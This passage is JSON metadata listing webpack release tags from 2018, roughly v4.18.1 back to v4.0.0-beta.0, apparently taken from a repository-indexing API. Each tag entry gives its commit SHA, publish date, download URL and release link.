bab94e4ff8ffca443e4fcb038bc4911e65e","kind":"tag","published_at":"2018-09-13T10:22:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.18.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.18.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.18.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.18.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.18.1/manifests"},{"name":"v4.18.0","sha":"ee7d9485fa30d1d3d5adbfdfb52c8f57ae8b439e","kind":"tag","published_at":"2018-09-10T15:34:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.18.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.18.0/manifests"},{"name":"v4.17.3","sha":"ee27d36e7cb0bed3ca32911165bbf01fef993e48","kind":"tag","published_at":"2018-09-10T14:25:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.17.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.17.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.17.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.3/manifests"},{"name":"v4.17.2","sha":"dfe6379052598a00f13bfa4f34ac73856ddf3dd0","kind":"tag","published_at":"2018-09-03T17:25:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.17.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.17.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.17.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.2/manifests"},{"name":"v4.17.1","sha":"ff3ef5eb284ddcd3da8c3f5bef6318e873779ffe","kind":"tag","published_at":"2018-08-22T09:50:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.17.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.17.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.17.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.1/manifests"},{"name":"v4.17.0","sha":"6f1f18f84dee330ec582d4e9c075c47c9a732102","kind":"tag","published_at":"2018-08-21T08:42:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.17.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.0/manifests"},{"name":"v4.16.5","sha":"025338cc91a867768325120d325b341bdcdc4321","kind":"tag","published_at":"2018-08-06T07:13:07.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.16.5","html_url":"https://github.com/webpack/webpack/releases/tag/v4.16.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.16.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.5/manifests"},{"name":"v4.16.4","sha":"1e9d98cb4e52a6efc58f516aa7451d1faa6347ba","kind":"tag","published_at":"2018-08-02T13:46:54.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.16.4","html_url":"https://github.com/webpack/webpack/releases/tag/v4.16.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.16.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.4/manifests"},{"name":"v4.16.3","sha":"482ff200303e84a65bdd5c456ce232309a6ce450","kind":"tag","published_at":"2018-07-27T10:14:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.16.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.16.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.16.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.3/manifests"},{"name":"v4.16.2","sha":"0d4c87fcf261de02a6ecfb05faab235c5a2a92dc","kind":"tag","published_at":"2018-07-23T09:51:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.16.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.16.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.16.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.2/manifests"},{"name":"v4.16.1","sha":"fa02f3d03344913f0a02d29cb363581bc8535bef","kind":"tag","published_at":"2018-07-16T08:27:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.16.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.16.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.16.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.1/manifests"},{"name":"v4.16.0","sha":"18d33c630f799e99e5e43fc0b6931713dc976529","kind":"tag","published_at":"2018-07-11T08:45:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.16.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.0/manifests"},{"name":"v4.15.1","sha":"81149be5c1cd2a3ce70c3abcc179c5070fd6dd1c","kind":"tag","published_at":"2018-07-05T13:32:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.15.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.15.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.15.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.15.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.15.1/manifests"},{"name":"v4.15.0","sha":"bdd4442c449b41d2a0ea7ed0de9cded3ba0e2e31","kind":"tag","published_at":"2018-07-04T19:42:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.15.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.15.0/manifests"},{"name":"v4.14.0","sha":"190cf7b017c9d4106c83553a1de652e53452b095","kind":"tag","published_at":"2018-06-29T12:12:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.14.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.14.0/manifests"},{"name":"v4.13.0","sha":"e3678aa3767aaeb26ebcf5e3028412bbebdb4f9f","kind":"tag","published_at":"2018-06-28T15:34:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.13.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.13.0/manifests"},{"name":"v4.12.2","sha":"c384c3fb1c162667d001f467db05e73570ddd4d2","kind":"tag","published_at":"2018-06-27T05:39:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.12.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.12.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.12.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.12.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.12.2/manifests"},{"name":"v4.12.1","sha":"8a7597aa6eb2eef66a8f9db3a0c49bcb96022a94","kind":"tag","published_at":"2018-06-24T08:44:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.12.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.12.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.12.1/manifests"},{"name":"v4.12.0","sha":"02a955b4335cb7eeeb4dd1c96ef5407c6bcea158","kind":"tag","published_at":"2018-06-08T07:24:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.12.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.12.0/manifests"},{"name":"v4.11.1","sha":"956c0b12dcc274f5e5725fc5abc51f805d916f43","kind":"tag","published_at":"2018-06-06T07:02:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.11.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.11.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.11.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.11.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.11.1/manifests"},{"name":"v4.11.0","sha":"e2fe2009d9f2b26a8d751ea89e184d6ec96e37d7","kind":"tag","published_at":"2018-06-05T11:25:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.11.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.11.0/manifests"},{"name":"v4.10.2","sha":"b8266d09a9472344a4894f1d8cf4067eb452019c","kind":"tag","published_at":"2018-05-30T08:29:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.10.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.10.2/manifests"},{"name":"v4.10.1","sha":"b80296f0c8b3907a8c96e4146bfb21746346fbb0","kind":"tag","published_at":"2018-05-29T13:38:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.10.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.10.1/manifests"},{"name":"v4.10.0","sha":"ba703401d580ad623af17fe96ed98b4d801e0313","kind":"tag","published_at":"2018-05-28T23:12:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.10.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.10.0/manifests"},{"name":"v4.9.2","sha":"317fb353518179c50342b1ac826d393a85b5903e","kind":"tag","published_at":"2018-05-28T20:28:54.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.9.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.9.2/manifests"},{"name":"v4.9.1","sha":"94cd709b06ffc7071b3505a746f0bb17fb7e3c33","kind":"tag","published_at":"2018-05-25T21:30:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.9.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.9.1/manifests"},{"name":"v4.9.0","sha":"bb0731d7897fb8a7369efd9d2f9bf0a8c08d546d","kind":"tag","published_at":"2018-05-25T20:17:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.9.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.9.0/manifests"},{"name":"v4.8.3","sha":"9a72294918064d6b976538adf808808de948585f","kind":"tag","published_at":"2018-05-12T20:56:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.8.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.3/manifests"},{"name":"v4.8.2","sha":"c92eabd3be44d4162be0affc9ef368624b0a6e51","kind":"tag","published_at":"2018-05-11T16:13:07.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.8.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.2/manifests"},{"name":"v3.12.0","sha":"cce33c206abaeef26d06b62102adf74a989a4696","kind":"tag","published_at":"2018-05-11T14:50:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.12.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.12.0/manifests"},{"name":"v4.8.1","sha":"2986ab1a18e895ac3f2546ac0c70bf73c0fdb679","kind":"tag","published_at":"2018-05-07T21:03:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.8.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.1/manifests"},{"name":"v4.8.0","sha":"586f9a21768e8bbc6bead6e564a6c7981a42f2d8","kind":"tag","published_at":"2018-05-07T11:39:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.8.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.0/manifests"},{"name":"v4.7.0","sha":"673c103715b5439bf72ed9767f5189b92ce7d428","kind":"tag","published_at":"2018-05-04T11:57:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.7.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.7.0/manifests"},{"name":"v4.6.0","sha":"e7c8fa414b718ac98d94a96e2553faceabfbc92f","kind":"tag","published_at":"2018-04-17T16:23:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.6.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.6.0/manifests"},{"name":"v4.5.0","sha":"e400445445a2f91d19aa8c79aa7b34b66011e661","kind":"tag","published_at":"2018-04-04T13:07:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.5.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.5.0/manifests"},{"name":"v4.4.1","sha":"0e404b8683d79052e3a6b42743bd3061f17a5a5d","kind":"tag","published_at":"2018-03-29T15:28:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.4.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.4.1/manifests"},{"name":"v4.4.0","sha":"e3bb8c9c8f5a30884b4df01bfbbc772cc1fb8cda","kind":"tag","published_at":"2018-03-29T14:57:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.4.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.4.0/manifests"},{"name":"v4.3.0","sha":"54ceb3c04d513ef5c7b78eaf4d391d14cfbe8282","kind":"tag","published_at":"2018-03-27T09:00:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.3.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.3.0/manifests"},{"name":"v4.2.0","sha":"d668a23fdc69c61ab80ec8db89a5b49778559534","kind":"tag","published_at":"2018-03-21T08:26:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.2.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.2.0/manifests"},{"name":"v4.1.1","sha":"41bb63ad69d0f32c042e74e732cb045b5966c452","kind":"tag","published_at":"2018-03-07T15:37:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.1.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.1.1/manifests"},{"name":"v4.1.0","sha":"f916fc0bb70585cf04a92cd99e004e4879f1d337","kind":"tag","published_at":"2018-03-04T10:39:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.1.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.1.0/manifests"},{"name":"v4.0.1","sha":"5044762c846a3a83a208853e48785a293fe9ef7d","kind":"tag","published_at":"2018-02-26T20:11:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.1/manifests"},{"name":"v4.0.0","sha":"213226ece261a0e89edb9de15fbc6775418f6041","kind":"tag","published_at":"2018-02-25T02:37:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0/manifests"},{"name":"v4.0.0-beta.3","sha":"4c25bfbaf2e01cf23708a381319b43367701e5b5","kind":"tag","published_at":"2018-02-24T14:55:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-beta.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-beta.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-beta.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.3/manifests"},{"name":"v4.0.0-beta.2","sha":"2ad530e4b486c248758f6d9d94070f207ef5f2e9","kind":"tag","published_at":"2018-02-17T13:10:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-beta.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-beta.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-beta.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.2/manifests"},{"name":"v3.11.0","sha":"bc840ec8747ba19c9e87629f2959ed2e65a9ffbe","kind":"tag","published_at":"2018-02-10T14:37:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.11.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.11.0/manifests"},{"name":"v4.0.0-beta.1","sha":"df65475ba32a5881f48ab9d90e1c010ea57c3d65","kind":"tag","published_at":"2018-02-10T14:10:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-beta.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-beta.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-beta.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.1/manifests"},{"name":"v4.0.0-beta.0","sha":"ae0dc62b7b4cc1ee3170c8ce3d